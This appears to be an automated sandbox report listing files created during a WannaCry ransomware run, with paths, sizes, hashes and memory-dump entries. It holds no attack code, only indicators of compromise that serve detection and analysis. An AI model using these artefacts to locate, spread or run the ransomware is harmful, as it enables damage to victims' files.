C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db

Filesize
48KB

MD5
f04590baa48bb0680ce5e81f2bb7318f

SHA1
fd053052fd6acc8e475eada1886992e8619822bf

SHA256
cbabea1669a73cd188a350e79ac2eec0e78b2a5ea90d1a4a60d56fc07efffa93

SHA512
c797f2b578d5229b8ab6601f1902e3b5ce5c4b05ea31433f9f49d4c622d2253bd61194583c238fc0f04cdde1299bfa3d60b5d8308b9f8f40e7fb63c192dbb77f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD3C5E.tmp\sist02.xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
322B

MD5
b3799a3f09e503f0e4cdd2865c562331

SHA1
99a26ce86ef22105b62cfa8fc49030d3543786b1

SHA256
7a85ea79b9e828a75496ee9f04e1c0aac754314517a1792647c060fd8c66f1dc

SHA512
831385ffb42b4f0f6494d04ea4f7ec5152b382b932a91a71360842a4e37e6c4489f7e2106ed5a951f97f1ddb0a78ac1fc5ed596ebc8f6ca2f584dd47b7c50cc9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
294B

MD5
46dc5b4f33c3b621e505244f1cc083b9

SHA1
7093e99173528a80ec23afb931e6baed41415634

SHA256
f57eb65680753efad78561e4c6404c3be7a8bf857ec455a9ae0d0951cfdb753b

SHA512
db0598f39deb378036d900c9cccb346b245afe022f63c1cf89289894e39456935ce23fe32a83c738e24ed6c7b344f7e6cc8806cc158c7346d2f2bd63ac45eb13

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
40040a52a53ac3522e0a64f46194230d

SHA1
0cc5b90f5d3ecaaf8619daa750507e9be7f4353e

SHA256
6631a3586a2b725e6a5961140980242012304e058921d71c6bab9add1568bf20

SHA512
3f43357bdfc881345b8f7e18574567b6e50448ab74474b1797209d940f5cadb5bca40c7fc68eb8dae32349dff30157fc8ad346f5a25dcc4d56f43de87d03695b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
4874a4724d02c6dff481c1165d99a543

SHA1
3ca233fbac69b2dc578021a78ab92326cc1606f8

SHA256
239ca055f5d3c9f9fe8abf8d940ea436e0dadb2e6ca77af46daa59e5ebae92e1

SHA512
e4bb771172022d1f9dfe47c5a9745018da547eb2efc43a6d4a6e96e6e25a7731ab244d2ef15d1d73a7ed7688e6069d6ae5023231cc7904ca72f328dd370c8842

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
5.6MB

MD5
e421504efb275076f47c606da2dfd283

SHA1
ea27b939b040d8160c0b3e603c639af7803d81ac

SHA256
84958e4db38c3f28510e4d42b885ccf8f53ddcae07f38b94a530e6df58fbc35e

SHA512
864946b58330379515cf78fc15244125f3799a2006eb4679b34742127a65810c8400c157bad9c70c67e7d4fce24f43c4b7f9624e29bb1042702b2e4a96eb5bf8

Download Submit
C:\Users\Admin\Desktop\@[email protected]

Filesize
933B

MD5
f97d2e6f8d820dbd3b66f21137de4f09

SHA1
596799b75b5d60aa9cd45646f68e9c0bd06df252

SHA256
0e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a

SHA512
efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0

Download Submit
C:\Users\Admin\Desktop\AddDisable.emz

Filesize
511KB

MD5
7c8cabf27bc91862fec991b98a7bb0b1

SHA1
194df63cd4add369aaf0a26721e6f9d9207acf1d

SHA256
2be2b22df7fecc8b5c620849839e0079a26145879bba978871c889339fc43707

SHA512
4a14ba0a7346be3a7b4a98902381269a2195fc94e061bb36ee397daee208a8db6ef2712b18dbef9eef2d6a19c0d670b30a93030a9c013a6c8b4059b9eb596874

Download Submit
C:\Users\Admin\Desktop\BackupPing.vbs

Filesize
302KB

MD5
c8a0f99d37a23f7510fa49eb88664008

SHA1
162de02e45139d67770b7c39642ae4b05de5670a

SHA256
00a92a9118957e2e935e1bc75da43da3a0c82d18c850fdf955c66024d79b6341

SHA512
cbb6194c910f99aa2507deaf2ac80358467ebb71b03220edca26750a1ab7fef6f22ffba57de5af44b7d36e6c5a3282353eb82b4b29c7c91c5e7ee0a1231a69a8

Download Submit
C:\Users\Admin\Desktop\CheckpointTest.MTS

Filesize
674KB

MD5
db2f91d0d12333fcae271f20db7c88da

SHA1
dd9a24709439903785361f40aa65a91276c8fd61

SHA256
3f42de14725c2078aa65ebe9d53527d9fe927124b1b676922e7b704f9afaa063

SHA512
23adb53aea88819c41b8b190461c87a06fd340e27da517f1dba06eea79c67518d0ef07922bfc75d7d0a08d1cb9c2d8b177ba5029ae2a6ed8335d8dd156953ba7

Download Submit
C:\Users\Admin\Desktop\ClosePop.asx

Filesize
395KB

MD5
0cd8fd790c1f136538b5d35ad9cf0a05

SHA1
d40effd987cc16254aad5194a9c2f5677cbeae84

SHA256
e7e1060433c68ab9e66ea3027b32b2e6c839b7220473cdb2f5afa2de91ed7d74

SHA512
3c296222c949498e965cb8c5a7413ffda425ed6bbfebcd1a27e32b6d839e646ee3384dd045ee0b806484a662f40aef8977084bde589fc54b4f34fe3f830ac2a1

Download Submit
C:\Users\Admin\Desktop\ConvertMeasure.wvx

Filesize
1000KB

MD5
870c42c90b1c901c2982e3c17460e385

SHA1
daec8fc5e72fb45c0c1f45d96f38bde38fffa6d7

SHA256
09104136329a2829245513d0ec0d4e219335d2258215a77dc7fc69afdec7f8bf

SHA512
44e4e121ef9227675a3ccdad4973ec804a460d7ca9570073961fb7b9ceec14e57107c672d71ea71b4a08d225db1250ab2ec7bb975c7c7b59776a78221d3f7cee

Download Submit
C:\Users\Admin\Desktop\CopyUpdate.ocx

Filesize
558KB

MD5
c74afc8ea5591f467606db260ec260a9

SHA1
ac0b03e5aaa8abbd2bea51c4c74bd02e3794cc4c

SHA256
2f4523e1320c7c96cbe735bf30c9bad813b7324aa3b6fd92fc9b3c2d44b2658a

SHA512
219058ee4a926ba092ca91505b7707734cb874bafb7af2fb06eba6a44691412164c79a99dda10f3efe7a07c42c2581ac2aac85cf5b77f17638c217fd554a78d5

Download Submit
C:\Users\Admin\Desktop\EditInstall.html

Filesize
581KB

MD5
f79cb2f1e3e16495f913ca06ed75515f

SHA1
486ad18e5d8cccfc51a1ccb1de64c84b005a9394

SHA256
7b7717c421df634cf593cb491bd2a57ea20c3f177503fcd425bf0ac9c6cb6ba4

SHA512
448cd034af4afad2d65d5ca946609316df373a533d6fd41cab1aede08139df645d4e9f9fea4c6f2e69704e02566cb6361a8ff6c6c41c35dfc2b929d892328c15

Download Submit
C:\Users\Admin\Desktop\ExportRedo.xlsx

Filesize
11KB

MD5
c46fd3ecc2f4a28b08eaa1dd2271f76e

SHA1
68fbc9c3042dfcc053f4f63f1e226afad1c02008

SHA256
373aa7e98550201e5504e093c5937a500a994fe9e47e83531e77ba5d9564a4d0

SHA512
aed5a36c63e0f56d964d1d97d01a8b7d81f41966e9accd838370d7dff15fb401f643e53dcdc274bf08d83198ccb5282a23545607aa0ad91b47cafe6d8497bc6f

Download Submit
C:\Users\Admin\Desktop\ExportReset.3gp2

Filesize
372KB

MD5
4dba5e4179f2c416d3612c4b0ae945c4

SHA1
8b9f6798f1a2eaccf6541bee196f59ca320d13f9

SHA256
51aaf60b9ccda54262c04bacbcd870e80c3b1f8d511db1e48d7eeffc8081dc93

SHA512
092eca9e99750f5ca7b4b3514c2efdb89860cb586a301d7e1accffcc768c51d47015ceccad73f38669c6a6bf1259ba306c7bbdd70fc6c1a581e479653bc40356

Download Submit
C:\Users\Admin\Desktop\FindResize.ps1

Filesize
628KB

MD5
bf02228d47e32063e06fc31e03786bff

SHA1
2d866fe8317a4ccc8475e73641075d9d8dda0376

SHA256
33fab8331954dd2080586675e200057e4689eb303f3b17e01f27a20cba183ebc

SHA512
688626f4af74278526ff5bb7e01ea662dd96381e6748de03903b941452993fcbd5dde9cf5f50d8b150f357d2f4e80c0c2b9ec566ca0a7c9231251448bc5a411e

Download Submit
C:\Users\Admin\Desktop\InitializeConvert.vsx

Filesize
279KB

MD5
70a417ab397a830ae2ff53392837cee3

SHA1
8b69fe0783b3951008a5ab8c7cf6f3ed8adbc8a2

SHA256
e9b8c78c3a21e0aff1372dad4ffff8f077511d2b308664b876b7658fd255497c

SHA512
c85ac579341a1192928f52998b0254c75404b4d5ea7fe6dae8ce9ac2f2707338de595fc7a4eee192707762a509462e1292a4b5ee165ab46a7fb79ab2b5bf275b

Download Submit
C:\Users\Admin\Desktop\InitializeExit.wvx

Filesize
698KB

MD5
50246bfa64c4cf03143b2ba483197a11

SHA1
29f551a999072478a2bf95b11aef13a7cd555eee

SHA256
cb4d024ba073e5f32f1cbfa7c73a3e698a28f20729f4bcf59946e0a8ef237de9

SHA512
41e870532ff55aa6e9637deae80d6ac75f7277308e15d6ab52dbb175a9c55de73c9aec5d2cb48fb9352751fa4d4362e8c398e7075dc756d91ccc6217159c962f

Download Submit
C:\Users\Admin\Desktop\JoinUnprotect.bmp

Filesize
255KB

MD5
8576225ef4376a7bb33b6aa1733591b3

SHA1
647f3c593a2fe0a28f597facc20dbfded4468afb

SHA256
9c9b5c51ebcac53937b6aca2ce5ef95477dff4120189f451f10c27dc8c1c9fdb

SHA512
10d62825b7ad134841c837ff6c25f61d41ae1e51547fb1a411eef4f85840ea642e4b853f10f47bd1fad6d6348ea076551e7c372114d619f9552cfed1332e2f21

Download Submit
C:\Users\Admin\Desktop\Microsoft Edge.lnk

Filesize
2KB

MD5
8b65a0f81e46aa536c22141b50c49c6a

SHA1
e3fdfea2e90dc5c03412abbeaab6a155844986db

SHA256
7ec653f9c59ffaa8bd70deafaaed42374aabddfd88a57ab6495d014e823fd244

SHA512
43af598f2e4be063beae2c1973ec606cffdabc2b9e4437a32311452610b85d46381dd1452ca92e72fc1e6df10a08b96111497d4bdb9291b0e246dfdba14de3b7

Download Submit
C:\Users\Admin\Desktop\ProtectCompress.ico

Filesize
442KB

MD5
e6918a823cdbec78d66b39f9326c0322

SHA1
9ae3f1415ba09cf757635c86f9b5591b4014351f

SHA256
e7a644215fc81bc94219449944698a2ad97dfe522ed7338a3308410c5380d212

SHA512
92c523b9310c3b9864761f7613087130be1eeaf2fc940a943525e1cf2f4a9a25be1008f6f4c8f97601610a5839b6a439ebf6f6b35fcefc92741a8d6e84e490b2

Download Submit
C:\Users\Admin\Desktop\RedoDisconnect.scf

Filesize
535KB

MD5
c1d1ec8110252bb1b74fbf57e96673c3

SHA1
aa865d66efb72b15d0b0c615bc47ec1e79473247

SHA256
92e3d17b1d7c0897e8f052d878c088eb33fae10ae02549dbc23c9f3b66d736e4

SHA512
cfc01738a7c6706857e37b24c9ed6c71aa67ce2c5ed46e5b6c4db247618b92fd8952ffcadd1c4fb1564d94c44572638dfb99840af9e813c224e8b82810608262

Download Submit
C:\Users\Admin\Desktop\SelectConvertFrom.odp

Filesize
418KB

MD5
e051ebebfbc73a61746ba1cf6c177001

SHA1
6fa6ae827368c240b81ec95423abef70fc6a0785

SHA256
810e86d669b015422b6c2392cf34c817b3015658c1d583b4204060775f77fd27

SHA512
6b7282e57cd2b7ec6c514bd394e17896f0bb5b6bd62ff68fc2328772145d11bd1b0599719e409ace71ad31425e1c717a87621bb1f9687f1c14ac70b718ec61f0

Download Submit
C:\Users\Admin\Desktop\SelectReset.png

Filesize
605KB

MD5
25a8162d5bfb9b63d250fdad68833e1c

SHA1
db3b4366b3228c6f04e56e9df7904b54d45f12e8

SHA256
88a543e1ec216b8ffac229e77c2a1b89e44f024ab6c266a3a8fc1813a91026ce

SHA512
dae84448a9ebc0ab22a922b776e8586ff37d11b2739caa7f8a3f354991804f70c6c58af7c6167d01848206888f75a10dfd8f62c0177ff1ff6b89c0bf2d5f5fa4

Download Submit
C:\Users\Admin\Desktop\SuspendWait.MOD

Filesize
721KB

MD5
d40b66d2cc279e1e1edd9c562e745255

SHA1
b384d7a3e88acbddc10fedaa15068ced1f908105

SHA256
fc998bd490678f41011eddccb6d7eb263b20ce33a9a9f9fc3d4fc3a058534914

SHA512
26827e3d23d7653cbc7fb99febe51f31b5d3c58ddb7e53e02739d35b621c03f60ba88ce66381b3ab3ee024912b929f658f0abe382f014a36296a0382a9537264

Download Submit
C:\Users\Admin\Desktop\SyncOpen.3gp2

Filesize
325KB

MD5
fc8d7718d1b08b9d900b6df26bea3fbd

SHA1
1a014c39198ad81e5782bc1a67020fba59062933

SHA256
e668654ecd6676be43fe255f4401c9a75c17fd22fafc9b88e3ba63ce1e2f1934

SHA512
cee470640f0e668224963db3f7b46eb3df0ef06398ed5e599e28f91bf1941f2719bbb12b0b0a9fde5aaed1d17bb90852b60d8c60b18ff47f5e35e5f0ebd791cd

Download Submit
C:\Users\Admin\Desktop\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Desktop\TraceLock.ppsx

Filesize
349KB

MD5
e64086610cb8b00a30e77cbbe6bc130d

SHA1
452fcb122bff65ab00e0cdc249b2976bbf9cffc4

SHA256
b98d8fa44176104103bf66501ea12ad55a66b70d7c4605afea7d87918f12330c

SHA512
3d058cdd757b8ca3ba32e392323760263d8e70f3236a0fee37580e7027726de8943721e8fa7adbb84e9c6b1b1d4fb7c7aea9906d140c4c2556a0807dd782ee81

Download Submit
C:\Users\Admin\Desktop\UninstallUnlock.wmf

Filesize
465KB

MD5
3db1755b73b1bfbea0e45fd6521649d0

SHA1
d4fbda05c0843c8f8f1f606ea85cf2945c2570b9

SHA256
fe5d31f3f11b61e020a0c8336c47dfccde15d88af209bf7eba66d852100e2386

SHA512
7f6259ea488c75701a3a6f01ecc47ccaa7f0cfc8436da2c3f0620c3a02f03d35f2496e7b2784bd4011f78f5dd090b1229f704e8817cf5081af55bcbabb5aa968

Download Submit
C:\Users\Admin\Desktop\UseReset.cr2

Filesize
488KB

MD5
3fdc12744f10f17f0035bbc803a7d0d0

SHA1
7354c8e9fef91dd59b96ffe9aa42a9abe0150188

SHA256
55b46b2b87cfe0d830b34b57cb0e6b769c64d6d1f25a1e90c641de25b1ab7700

SHA512
d191dc05e83828277453d6a6cfd0c4250f79573a2a95cd7a372f692751f59aecef3c1299b6a32dcc5f18dac491177f3ab6bf6155139c4a2aacce63c019bdeaa3

Download Submit
C:\Users\Admin\Desktop\UseUnregister.contact

Filesize
651KB

MD5
4f05d2dacc6e03f185b00daa8ff43d72

SHA1
b522076437859813a98f256a72f0224fc793d5c2

SHA256
ec8d8c74b4ca92121f87b3a456f8b46fe9bfa44d21252d404841b163052a4564

SHA512
3536c3cb29e341e642da15b3bc04e285ab887430cf0272bc733853d6504e55e9545026c0786cac53c3cae48b6f2721f1f0bd8ed94ea98cb7b6591cd1d23dfa02

Download Submit
C:\Users\Admin\Desktop\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\Desktop\~WRD0000.tmp

Filesize
11KB

MD5
60512db75d23fa1f7c2d54dd716977fa

SHA1
c1bf3f3806476563d505f65844acf37397b7052b

SHA256
5a1187a03d8f38b235350feca8c0bc80e8bb343932d589c9ec4804eb0a1ad86d

SHA512
016d08c023405b3c568ec4f4c4a4d18173cb078f4b7d714a710bda85e40e801fd46401ae42f91a31abcb436413c43f645ec9471997d30572cd8d1e8936f0b7f8

Download Submit
C:\Users\Admin\Documents\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Downloads\WannaCrypt0r.zip

Filesize
3.3MB

MD5
e58fdd8b0ce47bcb8ffd89f4499d186d

SHA1
b7e2334ac6e1ad75e3744661bb590a2d1da98b03

SHA256
283f40e9d550833bec101a24fd6fd6fbd9937ed32a51392e818ffff662a1d30a

SHA512
95b6567b373efa6aec6a9bfd7af70ded86f8c72d3e8ba75f756024817815b830f54d18143b0be6de335dd0ca0afe722f88a4684663be5a84946bd30343d43a8c

Download Submit
C:\Users\Admin\Downloads\WannaCrypt0r.zip:Zone.Identifier

Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
C:\Users\Default\Desktop\@[email protected]

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Public\Desktop\Acrobat Reader DC.lnk

Filesize
2KB

MD5
dc7822b900a5f648b5085b190e7a322e

SHA1
bf6671f9215a0e87e657ae45fb3f8a9086266fcc

SHA256
749fd5824f9272324a6f3a9841433ead150ee2ea86d093f1f82b2b584bbd2d19

SHA512
fd879065a594e9f200ec1d261a9646a2d6230198bd5ac1fe8e29f0605957fc398060b58a14d67d16f5a6c2b3c35009fd560f2b0db273e7e631dd9d172b3a7680

Download Submit
C:\Users\Public\Desktop\Firefox.lnk

Filesize
1000B

MD5
924e7ed05d6ae1d8f765e1b9d72bb616

SHA1
f81d69b5bb632e8c6c83438f08f554b0652721db

SHA256
3a3cc8044947f0379fc06d8b0ad1eeca5f794a36955f7e82098e076eabc82cfc

SHA512
b936db7327ec4d8f5ac6435731aa3d9f34355ee88d96174d690f729e91db73eee495347daa9cc246447126df16d8381ea4e760497472ee157778d746b7bebf91

Download Submit
C:\Users\Public\Desktop\Google Chrome.lnk

Filesize
2KB

MD5
1da0e7f78b54bea5239f38915c151ef3

SHA1
2dcb203c3523820c068e9d2ef6f5c559ac674cd4

SHA256
34f56e6a7b5b31350182ba8aefc4dbf2e49ded1092def70f98f023c82cfef831

SHA512
2a05260e979d629b0b4ef8732071209bfcf731b1c75c4c9f7c211a9e64d08bfd4233d2775e84e90f6f51cfb1be41c9cb7628f246b4bd28332ae96033757f52d5

Download Submit
C:\Users\Public\Desktop\VLC media player.lnk

Filesize
923B

MD5
fdb42f49df84781292624bbc41ec44db

SHA1
1d01869b75c28d05bfc657b96497e4c6fe597c5e

SHA256
37df194f51bd617913b0650c175571559b68943cb40c609020898174ee9259f8

SHA512
0526ecf8c9ef86bdcf54e41b6d8daae83ad96a5ceccd27f3d5b02b103bcd428a13b5db228ea99759e812b9dfd0c3f8892fb2acf6baaf0067fd3cf78ad803577f

Download Submit
memory/1036-2756-0x0000000073FC0000-0x0000000073FE2000-memory.dmp

Filesize
136KB

Download
memory/1036-2761-0x0000000074010000-0x0000000074092000-memory.dmp

Filesize
520KB

Download
memory/1036-2798-0x0000000073C90000-0x0000000073EAC000-memory.dmp

Filesize
2.1MB

Download
memory/1036-2792-0x0000000000930000-0x0000000000C2E000-memory.dmp

Filesize
3.0MB

Download
memory/1036-2790-0x0000000073C90000-0x0000000073EAC000-memory.dmp

Filesize
2.1MB

Download
memory/1036-2784-0x0000000000930000-0x0000000000C2E000-memory.dmp

Filesize
3.0MB

Download
memory/1036-2770-0x0000000000930000-0x0000000000C2E000-memory.dmp

Filesize
3.0MB

Download
memory/1036-2762-0x0000000073FF0000-0x000000007400C000-memory.dmp

Filesize
112KB

Download
memory/1036-2763-0x0000000073FC0000-0x0000000073FE2000-memory.dmp

Filesize
136KB

Download
memory/1036-2764-0x0000000073F30000-0x0000000073FB2000-memory.dmp

Filesize
520KB

Download
memory/1036-2765-0x0000000073EB0000-0x0000000073F27000-memory.dmp

Filesize
476KB

Download
memory/1036-2753-0x0000000074010000-0x0000000074092000-memory.dmp

Filesize
520KB

Download
memory/1036-2754-0x0000000073C90000-0x0000000073EAC000-memory.dmp

Filesize
2.1MB

Download
memory/1036-2766-0x0000000073C90000-0x0000000073EAC000-memory.dmp

Filesize
2.1MB

Download
memory/1036-2755-0x0000000073F30000-0x0000000073FB2000-memory.dmp

Filesize
520KB

Download
memory/1036-2757-0x0000000000930000-0x0000000000C2E000-memory.dmp

Filesize
3.0MB

Download
memory/1036-2760-0x0000000000930000-0x0000000000C2E000-memory.dmp

Filesize
3.0MB

Download
memory/1104-1226-0x00007FFA6E0B0000-0x00007FFA6E0C0000-memory.dmp

Filesize
64KB

Download
memory/1104-1223-0x00007FFA6E0B0000-0x00007FFA6E0C0000-memory.dmp

Filesize
64KB

Download
memory/1104-1224-0x00007FFA6E0B0000-0x00007FFA6E0C0000-memory.dmp

Filesize
64KB

Download
memory/1104-700-0x00007FFA6BDF0000-0x00007FFA6BE00000-memory.dmp

Filesize
64KB

Download
memory/1104-699-0x00007FFA6BDF0000-0x00007FFA6BE00000-memory.dmp

Filesize
64KB

Download
memory/1104-697-0x00007FFA6E0B0000-0x00007FFA6E0C0000-memory.dmp

Filesize
64KB

Download
memory/1104-698-0x00007FFA6E0B0000-0x00007FFA6E0C0000-memory.dmp

Filesize
64KB

Download
memory/1104-694-0x00007FFA6E0B0000-0x00007FFA6E0C0000-memory.dmp

Filesize
64KB

Download
memory/1104-696-0x00007FFA6E0B0000-0x00007FFA6E0C0000-memory.dmp

Filesize
64KB

Download
memory/1104-695-0x00007FFA6E0B0000-0x00007FFA6E0C0000-memory.dmp

Filesize
64KB

Download
memory/1104-1225-0x00007FFA6E0B0000-0x00007FFA6E0C0000-memory.dmp

Filesize
64KB

Download
memory/3336-1343-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download